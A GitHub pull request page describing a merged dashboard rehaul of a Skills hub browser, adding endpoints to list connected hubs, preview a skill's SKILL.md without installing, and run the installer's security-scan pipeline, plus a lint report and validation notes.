feat(dashboard): rehaul Skills hub browser — connected hubs, featured, preview + security scan#40384
Merged
Conversation
…, preview + security scan The Browse-hub tab was a blank search box with sparse result cards (name + source + one Install button), no way to read a skill before installing, no visual security scan, and no indication it was even connected to any hubs. Backend (web_server.py): - GET /api/skills/hub/sources — lists the configured hubs (label + trust tier + GitHub rate-limit + index availability) and featured skills pulled from the centralized index (zero extra API calls), plus installed-skill provenance so the UI can mark already-installed results. - GET /api/skills/hub/preview — fetches a skill's SKILL.md text + file manifest WITHOUT installing (decodes byte-stored text, masks binaries). - GET /api/skills/hub/scan — runs the SAME quarantine + scan_skill + should_allow_install pipeline the CLI installer uses, then cleans up quarantine, returning verdict / per-finding detail / severity tally / install-policy decision. - search now returns per-source counts + timed-out sources + installed map. Frontend (SkillsPage HubBrowser): - Landing state: connected-hubs strip + featured skill grid (no more blank page). - Rich cards: trust-level color coding, source, tags, identifier, Details + Install (or Installed state). - Detail dialog: read the actual SKILL.md, on-demand visual security scan (verdict pill, severity tally, per-finding list, allow/block policy), GitHub repo link. - Search meta line: result count + timing + per-source breakdown (the 'feels slow / no feedback' complaint). Tests: 4 new endpoint test classes (sources/preview/scan + updated search shape) in test_dashboard_admin_endpoints.py.
Contributor
🔎 Lint report:
|
| Rule | Count |
|---|---|
invalid-assignment |
3 |
First entries
hermes_cli/web_server.py:6803: [invalid-assignment] invalid-assignment: Invalid subscript assignment with key of type `Literal["rate_limited"]` and value of type `Literal[False]` on object of type `dict[str, str]`
hermes_cli/web_server.py:6809: [invalid-assignment] invalid-assignment: Invalid subscript assignment with key of type `Literal["available"]` and value of type `bool` on object of type `dict[str, str]`
hermes_cli/web_server.py:6801: [invalid-assignment] invalid-assignment: Invalid subscript assignment with key of type `Literal["rate_limited"]` and value of type `bool` on object of type `dict[str, str]`
✅ Fixed issues: none
Unchanged: 5162 pre-existing issues carried over.
Diagnostics are surfaced as warnings — this check never fails the build.
changman
pushed a commit
to changman/hermes-agent
that referenced
this pull request
Jun 10, 2026
…, preview + security scan (NousResearch#40384) The Browse-hub tab was a blank search box with sparse result cards (name + source + one Install button), no way to read a skill before installing, no visual security scan, and no indication it was even connected to any hubs. Backend (web_server.py): - GET /api/skills/hub/sources — lists the configured hubs (label + trust tier + GitHub rate-limit + index availability) and featured skills pulled from the centralized index (zero extra API calls), plus installed-skill provenance so the UI can mark already-installed results. - GET /api/skills/hub/preview — fetches a skill's SKILL.md text + file manifest WITHOUT installing (decodes byte-stored text, masks binaries). - GET /api/skills/hub/scan — runs the SAME quarantine + scan_skill + should_allow_install pipeline the CLI installer uses, then cleans up quarantine, returning verdict / per-finding detail / severity tally / install-policy decision. - search now returns per-source counts + timed-out sources + installed map. Frontend (SkillsPage HubBrowser): - Landing state: connected-hubs strip + featured skill grid (no more blank page). - Rich cards: trust-level color coding, source, tags, identifier, Details + Install (or Installed state). - Detail dialog: read the actual SKILL.md, on-demand visual security scan (verdict pill, severity tally, per-finding list, allow/block policy), GitHub repo link. - Search meta line: result count + timing + per-source breakdown (the 'feels slow / no feedback' complaint). Tests: 4 new endpoint test classes (sources/preview/scan + updated search shape) in test_dashboard_admin_endpoints.py.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
The dashboard's Browse hub tab (Skills page) goes from a blank search box with sparse one-button result cards to a full skill browser: it shows which hubs are connected, surfaces featured skills on arrival, lets you read the actual SKILL.md before installing, and runs the same security scan we do at install time — visually, on demand.
What was wrong
Changes
Backend —
hermes_cli/web_server.pyGET /api/skills/hub/sources— configured hubs (label, trust tier, GitHub rate-limit, index availability) + featured skills from the centralized index (zero extra API calls) + installed-skill provenance.GET /api/skills/hub/preview— a skill's SKILL.md text + file manifest, without installing (decodes byte-stored text, masks binaries).GET /api/skills/hub/scan— runs the exactquarantine_bundle→scan_skill→should_allow_installpipeline the CLI installer uses, cleans up quarantine, returns verdict / per-finding detail / severity tally / install-policy decision.searchnow returns per-source counts + timed-out sources + installed map (drives feedback + "installed" badges).Frontend —
web/src/pages/SkillsPage.tsx(HubBrowser)web/src/lib/api.ts— types + client methods for the new endpoints.Validation
20 results · 0.4s · hermes-index:50 official:1aria-describedbywired.tests/hermes_cli/test_dashboard_admin_endpoints.py53 passed.npx vite buildclean; rebased onto currentmain.Infographic